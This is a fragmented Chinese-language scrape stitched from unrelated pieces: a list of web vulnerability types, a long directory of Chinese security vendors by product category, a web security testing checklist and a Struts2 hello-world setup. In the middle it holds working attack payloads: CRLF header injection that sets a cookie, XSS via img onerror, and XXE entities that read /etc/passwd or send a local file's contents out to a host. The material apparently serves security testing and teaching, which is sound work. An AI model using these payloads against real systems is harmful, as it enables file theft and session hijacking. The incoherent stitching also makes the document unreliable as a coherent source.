[code]    SQL联合查询注入



    SQL搜索型注入



    SQL报错型注入



    SQL数字型注入



    SQL字符型注入



    SQL基于时间的盲注



    SQL逻辑注入



    反射型 XSS



    存储型 XSS



    DOM型 XSS



    暴力破解



    PHP远程命令执行漏洞



    本地文件包含漏洞



    任意文件包含漏洞



    任意代码读取漏洞



    目录限制文件包含



    修改任意用户密码漏洞



    任意文件上传漏洞



    JS限制文件上传



    MIME限制文件上传



    扩展名限制文件上传



    内容限制文件上传



    任意代码执行



    ssrf



    无验证码爆破



    源码泄漏



    php://input伪协议。。。。。。等等漏洞共41个

• 存储介质信息消除/粉碎机：北信源、和升达、科密、30所、利谱、交大捷普、兰天致信、中超伟业、博智软件、方德信安、深圳汇远佳禾

• 防火墙/UTM/安全网关/下一代防火墙：天融信、山石网科、启明星辰、网御星云、绿盟科技、安恒信息、蓝盾、华为、软云神州、杭州迪普、华清信安、东软、上讯信息、利谱、深信服、360、卫士通、H3C、交大捷普、信安世纪、任子行、上海纽盾、金电网安、亚信安全、北京擎企、金山、君众甲匠、优炫、海峡信息、安信华、博智软件、中科曙光、中科网威、江民科技、六壬网安、安码科技、点点星光
• 入侵检测/防御：启明星辰、绿盟科技、网御星云、360、天融信、铱迅信息、蓝盾、杭州迪普、山石网科、安恒信息、交大捷普、任子行、经纬信安、漏洞盒子/网藤风险感知、华清信安、上海纽盾、东软、恒安嘉新、安天、金山、君众甲匠、海峡信息、博智软件、H3C、中科网威、江民科技、六壬网安、青藤云安全
• 无线入侵检测/防御：360、北京锐云通信、山东闻道通信
• VPN：深信服、天融信、蓝盾、360、华为、绿盟科技、卫士通、信安世纪、奥联科技、启明星辰、南京易安联、华清信安、上海纽盾、东软、海峡信息、博智软件、H3C、江南信安、弘积科技、山东确信
• 上网行为管理：360、深信服、蓝盾、华为、莱克斯、网际思安、软云神州、杭州迪普、北信源、网鼎芯睿、陕通、上海新网程、奥联科技、交大捷普、任子行、上海纽盾、东软、Panabit、北京擎企、金山、盛世光明、博智软件、H3C、万网博通、极安、江民科技、迈科网络、六壬网安、弘积科技
• 网络安全审计：天融信、莱克斯、启明星辰、交大捷普、绿盟科技、蓝盾、广州国迈、软云神州、任子行、雨人、上海观安、上海纽盾、360、恒安嘉新、盛世光明、海峡信息、博智软件、杭州迪普、中科新业、重庆智多
• 网络流量控制：360、深信服、流控大师、Panabit、蓝盾、软云神州、网鼎芯睿、互普&溢信（IP-Guard）、东华软件、上海纽盾、灵州网络、恒安嘉新、北京擎企、金山、盛世光明、杭州迪普、万网博通、极安、迈科网络
• 网络流量分析：科来公司、东华软件、绿盟科技、网鼎芯睿、上海观安、上海纽盾、恒安嘉新、Panabit、亚信安全、安天、江民科技、华青融天、迈科网络
• 防病毒网关/防毒墙：网御星云、蓝盾、冠群金辰、杭州迪普、瑞星、360、安恒信息、山石网科、亚信安全、安天、金山、天融信、海峡信息、安信华、博智软件、江民科技
• APT未知威胁发现：安恒信息、科来公司、360、天融信、启明星辰、东巽科技、安天、绿盟科技、华为、神州网云、成都力合智远、经纬信安、兰云科技、中铁信睿安、卫达安全、恒安嘉新、宝利九章、亚信安全、安赛创想、金山、海峡信息、博智软件、知道创宇、江民科技、六壬网安
• 抗DDoS产品：绿盟科技、华为、中新网安、铱迅信息、启明星辰、傲盾、蓝盾、杭州迪普、华清信安、安恒信息、兰云科技、上海纽盾、卫达安全、任子行、青松云安全、天融信、360、北大千方、知道创宇、神荼科技
• 抗DDoS服务：阿里云、腾讯云、金山云、百度安全/安全宝、360、安恒信息、兰云科技、网宿科技、上海云盾、中新网安、卫达安全、安全狗、青松云安全、电信云堤、UCloud、智卓云盾、知道创宇、蓝盾
• 网闸：360、北京安盟、利谱、启明星辰、杭州合众、北京盖特佳、天融信、交大捷普、天行网安、伟思、金电网安、赛博兴安、东软、海峡信息、安信华、重庆爱思
• 安全隔离与信息单向导入设备/单向传输机器：深圳中锐源、中铁信安、中孚信息、杭州合众、国保金泰、天融信、赛博兴安、普世科技、锐安、金电网安、北京安盟、中科网威、山石网科、哈尔滨朗威、利谱、北京远为软件
• 网络缓存加速·产品：缓存大师WebCache、锐捷、优络普、Panabit、安信华
• 网络缓存加速·服务：知道创宇、阿里云、百度云、腾讯云、帝恩思、DNSPod
• 网络准入控制：北信源、无锡宝界、蓝盾、互普&溢信（IP-Guard）、启明星辰、金盾软件、广州国迈、盈高科技、画方科技、联软、中软、上讯信息、交大捷普、信安世纪、中孚信息、上海纽盾、艾科网信、海峡信息、博智软件、江民科技、亚东软件
• 负载均衡：深信服、北京中科四方、东华软件、信安世纪、灵州网络、北京华夏创新、北京楷然昊天、上海云速、湖南麒麟、杭州迪普、启明星辰、南京易安联、上海纽盾、Panabit、北京擎企、H3C、弘积科技、北京远为软件、福建伊时代
• 应用交付：智恒科技、深信服、信安世纪、瑞友天翼、360、天融信、东软、任子行、优炫、中科曙光、弘积科技
• 加密机/密码机：江南科友、网御星云、天融信、三未信安、山东得安、卫士通、山东渔翁、无锡江南、江南天安、江南博仁、兴唐通信、中安网脉、君众甲匠、立思辰、江南信安、山东确信、信安世纪
• DNS安全：电信云堤、厦门帝恩思、知道创宇
• 不良信息识别与监测：金惠科技

• 桌面管理/主机审计：北信源、汉邦、联软、蓝盾、互普&溢信（IP-Guard）、启明星辰、网御星云、360、天融信、金盾软件、广州国迈、软云神州、哈尔滨朗威、上海创多、深圳金天眼、杭州正杰、浙江远望电子、北京盖特佳、峰盛科技、中软、卫士通、沈阳通软、圣博润、上讯信息、交大捷普、中孚信息、上海浩迈、金山、海峡信息、博智软件、江民科技、江南信安、山丽信息、亚东软件、706所、中电瑞铠
• 单机防病毒：瑞星、江民科技、金山、360、百度、腾讯、东方微点、费尔、火绒、亚信安全、安天、博智软件
• 网络防病毒：瑞星、360、金山、江民科技、东方微点、北信源、亚信安全、安天、博智软件
• 主机文档加密与权限控制/HDLP：亿赛通、天锐绿盾、时代亿信、明朝万达、蓝盾、互普&溢信（IP-Guard）、北信源、金盾软件、启明星辰、北京盖特佳、峰盛科技、中软、卫士通、上海祥殷、上海前沿、杭州华途、江苏敏捷、思智泰克、交大捷普、中孚信息、福州深空、天融信、思睿嘉得、合力思腾、深圳虹安、上讯信息、成都力合智远、莱克斯、365数据安全/四川西图、山东申启、金山、天空卫士、锐思特、赛猊腾龙、海峡信息、深信达、博智软件、江民科技、天喻软件、上海谐桐、亚东软件、武汉百易时代
• 源代码加密及嵌入式开发源码加密：深信达、明朝万达、亿赛通、IP-Guard、山丽信息、天锐绿盾、互普&溢信（IP-Guard）、中软、虹安
• 主机安全加固：浪潮、椒图、安全狗、广州国迈、中软华泰、上海观安、可信华泰、中嘉华诚、中航嘉信、易路平安、亚信安全、安天、优炫、安普诺、中超伟业、中科曙光、神荼科技、青藤云安全、安恒信息
• 终端登录/身份认证：上海格尔、吉大正元、卫士通、信安世纪、上讯信息、南京易安联、北信源、九州云腾、中孚信息、博智软件、哈尔滨朗威
• 移动存储介质管理：北信源、北京天桥、启明星辰、金盾软件、广州国迈、哈尔滨朗威、上海创多、亿赛通、交大捷普、上海浩迈、上海格尔、安天、金山、天喻软件、山丽信息、亚东软件
• 补丁管理：北信源、360、启明星辰、金盾软件、上海创多、交大捷普、亚信安全、金山
• 打印安全/打印管理/打印审计：北京恒安讯佳、北信源、中孚信息、安普锐、天锐绿盾、金山、保旺达、哈尔滨朗威、天喻软件、瑞达信息、山丽信息、武汉百易时代、鼎盾科技、思为同飞

• 网页防篡改：安恒信息、智恒科技、赛蓝、山东中创、绿盟科技、启明星辰、上海天存、上海天泰、福州深空、北京通元、国舜股份、蓝盾、安全狗、WebRay远江、杭州迪普、上讯信息、交大捷普、青松云安全、海峡信息、江民科技、立思辰、六壬网安
• Web应用防火墙·WAF·硬件：安恒信息、启明星辰、绿盟科技、天融信、铱迅信息、知道创宇、上海天泰、杭州迪普、山东中创、WebRay远江、蓝盾、北京千来信安、中新网安、软云神州、中软华泰、上讯信息、上海天存、利谱、交大捷普、任子行、中铁信睿安、上海纽盾、360、卫达安全、金电网安、安赛创想、东软、海峡信息、安信华、博智软件、山石网科、江民科技、立思辰、六壬网安、安码科技、神荼科技
• Web应用防火墙·WAF·软件：福州深空、安恒信息、铱迅信息、安全狗、云锁、青松云安全、上海天存、安码科技
• Web应用防火墙·服务&云WAF：安恒信息、阿里云、腾讯云、360、知道创宇、上海有云、湖盟、百度安全/安全宝、蓝盾、北京千来信安、中软华泰、上讯信息、快云、斗象科技/网藤风险感知、网宿科技、上海云盾、青松云安全、电信云堤、UCloud、数梦工场
• WEB漏洞扫描：安恒信息、四叶草安全、国舜股份、绿盟科技、知道创宇、WebRay远江、安赛创想、安犬漏洞扫描云平台、启明星辰、经纬信安、上海观安、斗象科技/漏洞盒子/网藤风险感知、恒安嘉新、安识科技、H3C、六壬网安、安码科技
• 网站安全监测产品：安恒信息、绿盟科技、知道创宇、360、WebRay远江、任子行、四叶草安全、安全狗、恒安嘉新、安信华、H3C、江民科技、安普诺、立思辰、浙江乾冠
• 网站安全监测服务：安恒信息、绿盟科技、知道创宇、360、百度安全/安全宝、WebRay远江、北京千来信安、任子行、安全狗、恒安嘉新、四叶草安全、浙江乾冠
• 邮件安全产品：守内安、网际思安、蓝盾、敏讯、冠群金辰、盈世CoreMail、时代亿信、上海格尔、安宁、凌久、国瑞信安、蓝海星、北京方向标、上海青羽/靠谱邮件、亚信安全、安宁、安普诺、武汉百易时代
• 数据库漏洞扫描：安恒信息、安信通、安华金和、建恒信安、中安星云、杭州闪捷
• 数据库防火墙：安恒信息、安华金和、中安比特/中安威士、帕拉迪/汉领信息、杭州美创、中安星云、杭州闪捷
• 数据库加密和脱敏：中安比特/中安威士、安华金和、迈科龙、中安星云、杭州美创、上海观安、优炫、广州鼎甲、杭州闪捷
• 数据库审计：安恒信息、安华金和、思福迪、启明星辰、网御星云、天融信、极地银河、山东中创、蓝盾、北信源、莱克斯、软云神州、绿盟科技、上讯信息、中安比特/中安威士、交大捷普、金盾软件、昂楷科技、帕拉迪/汉领信息、上海纽盾、东软、杭州美创、优炫、海峡信息、安信华、博智软件、中安星云、东华软件、六壬网安、思为同飞、706所、杭州闪捷
• 半自动&自动化渗透平台：安恒信息、安络科技、四叶草安全
• 应用统一身份管理/身份认证/单点登录/认证网关/PKI/CA/数字证书/令牌/各种KEY：天诚安信、派拉软件、神州融信、上海格尔、天威诚信、信安世纪、东软、吉大正元、安识科技、北京安讯奔、九州云腾、中科曙光、洋葱安全、极验验证、立思辰、江南信安、山东确信 | 各省都有CA，这个就单列了、中科恒伦、上海林果、福建伊时代
• 代码防火墙：上海观安
• 加密安全设备/NDLP：福建伊时代、时代亿信、365数据安全、天空卫士、思为同飞
• 反钓鱼/反欺诈：电信云堤、国舜股份、知道创宇、百度、阿里、腾讯、360、安天、亚信安全、安恒信息、江民科技、华青融天
• 语音安全：北京无限互联

• 数据备份：上海爱数、杭州美创、火星高科&亚细亚智业、苏州美天网络、信核数据、上讯信息、英方股份、上海联鼎、亿备&广州鼎鼎、和力记易、广州鼎甲、安码科技、南京壹进制、浪擎科技、福建伊时代
• 虚拟机备份与恢复：成都云祺、英方股份、和力记易、广州鼎甲、北京远为软件
• 数据清除工具：中孚信息、北京天桥、上海浩迈、万里红、中超伟业、博智软件、方德信安、哈尔滨朗威

• 虚拟化安全防护：安恒信息、启明星辰、广州国迈、北信源、中软、南京易安联、山石网科、阿姆瑞特、上海观安、东软、安全狗、云锁、亚信安全、金山、蓝盾、北京远为软件
• 手机防病毒：腾讯、瑞星、金山、360、网秦、百度、中软、安天、恒安嘉新、亚信安全、蓝盾
• 移动终端管理/EMM/MDM：国信灵通/启迪国信、北信源、360、明朝万达、中软、安天、上讯信息、北京珊瑚灵御、亚信安全、金山、蓝盾、江民科技、江南信安
• CASB/云业务安全接入代理：炼石网络、云安宝、信云科技、绿盟科技、启明星辰
• 手机APP安全：梆梆安全、北京智游网安/爱加密、阿里聚安全、360、任子行、北京鼎源科技、腾讯御安全、恒安嘉新、安普诺、安码科技
• 基于云的安全服务：青松云安全、青藤云安全、百度云、腾讯云、阿里云、360、华为、安全宝、山石网科、万般上品、东软、卫达安全、白帽汇、海峡信息、四叶草安全、中国电信·安全帮 | 此条目待调整、待完善！
• 大数据安全：安恒信息、启明星辰、绿盟科技、360、派拉软件、观数科技、瀚思、天行网安、上海观安、聚铭网络、中孚信息、恒安嘉新、志翔科技、知道创宇、科来公司、安码科技、杭州美创 | 这是一个比较纠结的分类，因为牵扯到的内容太多……现在主流的安全厂家几乎都能做一部分，但是……这个分类可能近期会做细化

• SIEM/日志管理/日志审计/SOC/安管平台：安恒信息、思福迪、360、天融信、启明星辰、东软、蓝盾、蚁巡、江南天安、北信源、上讯信息、赛克蓝德、神州泰岳、交大捷普、派拉软件、瀚思、中铁信睿安、聚铭网络、华清信安、上海纽盾、亚信安全、优炫、安信华、H3C、华青融天、安码科技、北京中安智达、706所、福建伊时代
• 运维审计/4A/堡垒机：安恒信息、思福迪、帕拉迪/汉领信息、浙江齐治、尚思科技、江南科友、绿盟科技、天融信、启明星辰、建恒信安、蓝盾、华为、泰然神州、上海艺赛旗、北京极地、信安世纪、圣博润、江南天安、国迈、上讯信息、神州泰岳、亿阳信通、麒麟、云安宝、交大捷普、德讯科技、任子行、派拉软件、上海观安、金盾软件、智恒科技、东软、金电网安、亚信安全、北京安讯奔、盛世光明、优炫、海峡信息、保旺达、安信华、中科曙光、六壬网安
• 网管软件/ITIL：广通信达、网强、汉远网智、北塔、蚁巡、华为、锐捷、摩卡[华胜天成]、国聿、上讯信息、交大捷普、飞思安诺/飞思网巡、恒安嘉新、优炫、艾科网信、海峡信息、迈科网络、东华软件
• 漏洞扫描与管理：安恒信息、榕基、启明星辰、绿盟科技、铱迅信息、极地银河、蓝盾、WebRay远江、江南天安、杭州迪普、天融信、交大捷普、安犬漏洞扫描云平台、经纬信安、上海观安、中铁信睿安、斗象科技/漏洞盒子/网藤风险感知、宿州东辉、四叶草安全、恒安嘉新、安天、蓝盾、君众甲匠、博智软件、中科网威、立思辰、六壬网安、安普诺
• 网络和主机配置核查系统：安恒信息、思福迪、绿盟科技、启明星辰、聚铭网络、北京随方信息、博智软件
• 主机安全保密检查工具：中孚信息、北信源、北京天桥、哈尔滨朗威、万里红、华安保、上海浩迈、博智软件、方德信安
• 信息安全等级保护测评工具箱：安恒信息、国瑞信安、圣博润、公安一所、锐安 | 注：市面上多家厂家均生产此产品，但公安部仅指定了5家作为“合格的”生产单位！
• 网络安全态势感知：安恒信息、知道创宇、360、绿盟科技、WebRay远江盛邦、四叶草安全、任子行、上海观安、兰云科技、聚铭网络、恒安嘉新、白帽汇、杭州合众、亚信安全、安天、郑州赛欧思、江民科技、科来公司、安码科技
• 应急处置工具箱：安恒信息

• 工控防火墙：中科网威、威努特、匡恩网络、谷神星、海天炜业、力控华康、天地和兴、安点科技、网藤科技、卫达安全、博智软件、九略智能
• 工控安全审计：威努特、天地和兴、匡恩网络、网藤科技、斗象科技/漏洞盒子/网藤风险感知、安点科技、博智软件、安恒信息、知道创宇、中科网威
• 工控漏洞扫描/挖掘：天地和兴、匡恩网络、网藤科技、斗象科技/漏洞盒子/网藤风险感知、博智软件、知道创宇
• 工控安管平台：天地和兴、匡恩网络、中科网威
• 工控主机安全防护：天地和兴、网藤科技、安点科技、九略智能
• 工控入侵检测/威胁感知/入侵防御：安点科技、天地和兴、网藤科技、博智软件、科来公司、中科网威
• 工控网闸：安点科技、中科网威
• 工控防泄密：匡恩网络
• 工控检查工具箱：安恒信息、
• 工控蜜罐：匡恩网络、
• 工控攻防实验室：匡恩网络、网藤科技、博智软件
• 工控态势感知：安恒信息、博智软件、360、知道创宇、浙江乾冠、九略智能

• 数据来源于申威产业联盟、龙芯产业联盟、中关村可信计算产业联盟自主可信专委会；
• 就自主可控行业的特殊性而言，很多大厂商是作为特供产品进行市场宣传，而小厂商只作为品牌规划，并没有特殊宣传，在数据收集时可能会导致内容不全面；
• 对于名单中未涉及的厂商，可以单独联系， 告知欲添加的分类、公司名称（需在上述3个联盟中）；
• 感谢中关村可信联盟自主可信专委会相关工作人员整理！
• 防火墙：中科神威、天融信、网御星云、东软、中科曙光、蓝盾、中航鸿电、中船综合院、706所
• 入侵检测/防御：中科神威、网神、中科曙光、安恒信息 、绿盟科技、汉柏
• 漏洞扫描系统：中科神威、安恒信息 、绿盟科技
• 安全管理平台：启明星辰、中科神威、360
• 网闸/安全隔离与信息单向导入设备：国保金泰、中科神威、北京安盟、赛博兴安
• 加密机：江南天安
• 终端安全：北信源、江民科技
• Web应用防火墙：上海天泰
• 堡垒机：建恒信安、江南寰宇
• 负载均衡：般固科技
• 防毒墙：江民科技
• 备份一体机：壹进制
• 网络流量分析：北京卓迅
• 网络准入控制：画方科技
• 存储：创新科、同有飞骥

• 舆情监控：中国舆情网、优捷信达、乐思、红麦、中科点击、泰一舆情、探宝、拓尔思、本果、软云神州、西盈、任子行、网藤风险感知、南京快页数码、博智软件、北京中安智达
• 威胁情报：微步在线、上海观安、斗象科技/http://FreeBuf.com/漏洞盒子、恒安嘉新、白帽汇、天际友盟、知道创宇、360、安恒信息
• 国产操作系统：Deepin深度、RedFlag红旗、Kylin麒麟、NeoKylin中标麒麟、StartOS起点/雨林木风OS、凝思磐石安全操作系统、共创Linux、思普Linux
• 国产数据库：达梦数据库、东软OpenBASE、国信贝斯iBase、人大金仓KingBase、南大通用GBase
• 业务风控安全：锦佰安、指掌易、邦盛、岂安、行邑、同盾、通付盾
• 蜜罐：安恒信息、三零卫士、凌晨网络、绿盟科技、默安科技
• 安全硬件平台/工控机：新汉、阿普奇、盛博、集智达、英德斯、福升威尔、华北科技、艾宝、华北工控、研祥、祈飞、研华，立华，惠尔，智威智能
• 数据恢复：苏州美天网络、金山安全、易数科技、华客、飞客、众成、博智软件
• 数据库准入：杭州美创
• 数据库堡垒机：杭州美创
• 红黑电源滤波插座：保旺达、启航智通
• 电磁屏蔽柜：启航智通、信安邦
• 数字取证：美亚柏科、盘石软件
• 安全计算机：瑞达信息

Location: 

HTTP/1.1 302 Moved Temporarily 

Date: Fri, 27 Jun 2014 17:52:17 GMT 

Content-Type: text/html 

Content-Length: 154 

Connection: close 

Location: [url]http://www.xxx.com.cn[/url] 

http://www.sina.com.cn%0aSet-cookie:JSPSESSID%3Dwooyun

HTTP/1.1 302 Moved Temporarily 

Date: Fri, 27 Jun 2014 17:52:17 GMT 

Content-Type: text/html 

Content-Length: 154 

Connection: close 

Location: http://www.sina.com.cn 

Set-cookie: JSPSESSID=wooyun

http://test.sina.com.cn/?url=%0d%0a%0d%0a<img src=1 onerror=alert(/xss/)>

HTTP/1.1 302 Moved Temporarily 

Date: Fri, 27 Jun 2014 17:52:17 GMT 

Content-Type: text/html 

Content-Length: 154 

Connection: close 

Location:



<img src=1 onerror=alert(/xss/)>

http://xxx.aa.com.cn/?url=%0a%0d%0a%0d%3Cimg%20src=1%3E

<!ENTITY file SYSTEM “file:///etc/passwd”>

<username>&file;</username>

<username>root:1:3.......</username>

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE root [

<!ENTITY % param1 "<!ENTITY internal 'http://www.baidu.com'>">

%param1;

]>

<root>

[This is my site] &internal;

</root>

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE root [

<!ENTITY % param1 "file:///c:/1.txt">

<!ENTITY % param2 "http://127.0.0.1/?%param1">

%param2;

]>

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE root [

<!ENTITY % param1 "file:///c:/1.txt">

<!ENTITY % param2 "<!ENTITY % param222 SYSTEM'http://127.0.0.1/?%param1;'>">

%param2;

]>

<root>

[This is my site]

</root>

！

绕过文件上传检查功能

上传文件大小和次数限制

注册时密码复杂度是否后台检验

激活链接测试

重复注册

批量注册问题

登录请求是否安全传输

会话固定

关键Cookie是否HttpOnly

登录请求错误次数限制

“记住我”功能

本地存储敏感信息

验证码的一次性

验证码绕过

短信验证码轰炸

通过手机号找回

通过邮箱找回

密码安全性要求

密码复杂度要求

密码保存要求

请测试所有接口水平越权情况

请测试所有接口垂直越权情况

反射型XSS

存储型XSS

DOM型XSS

SQL注入测试

写接口限制测试

写接口限制测试

SVN信息泄露

页面泄露敏感信息

目录遍历

CRLF测试

>

＞

>

＞

>

<img onerror=alert(1) src=>

＞

＞”</span

>

>

系统环境：Windows 7

Web服务器：TOMCAT 9.0(apache-tomcat-9.0.11-windows-x64)

JAVA 环境：JDK1.8(jdk-8u181-windows-x64)

Eclipse 环境：Eclipse-inst-win64

Struts2:struts-2.3.20-all.zip

  1：客户端在浏览器中输入一个url地址；

  2：这个url请求通过http协议发送给tomcat；

  3：tomcat根据url找到对应项目里面的web.xml文件；

  4：在web.xml里面会发现有struts2的配置；

  5：然后会找到struts2对应的struts.xml配置文件；

  6：根据url解析struts.xml配置文件就会找到对应的class；

  7：调用完class返回一个结果result，根据struts.xml返回到对应的jsp；

<?xml version="1.0" encoding="UTF-8"?>

<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://xmlns.jcp.org/xml/ns/javaee" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" id="WebApp_ID" version="4.0">

  <display-name>helloworld</display-name>

  

  <filter>

    <filter-name>struts2</filter-name>

    <filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class>

  </filter>

  

 <filter-mapping>

   <filter-name>struts2</filter-name>

     <url-pattern>/*</url-pattern>

  </filter-mapping>



  <welcome-file-list>

    <welcome-file>index.jsp</welcome-file>

  </welcome-file-list>

</web-app>

package com.imooc.action;



import com.opensymphony.xwork2.ActionSupport;



public class HelloWorldAction extends ActionSupport {



  @Override

  public String execute() throws Exception {

    // TODO Auto-generated method stub

    System.out.println("执行Action");

    return SUCCESS;

  }

  



}

<%@ page language="java" contentType="text/html; charset=UTF-8"

    pageEncoding="UTF-8"%>

<!DOCTYPE html>

<html>

<head>

<meta charset="UTF-8">

<title>Insert title here</title>

</head>

<body>

this is result.jsp

</body>

</html>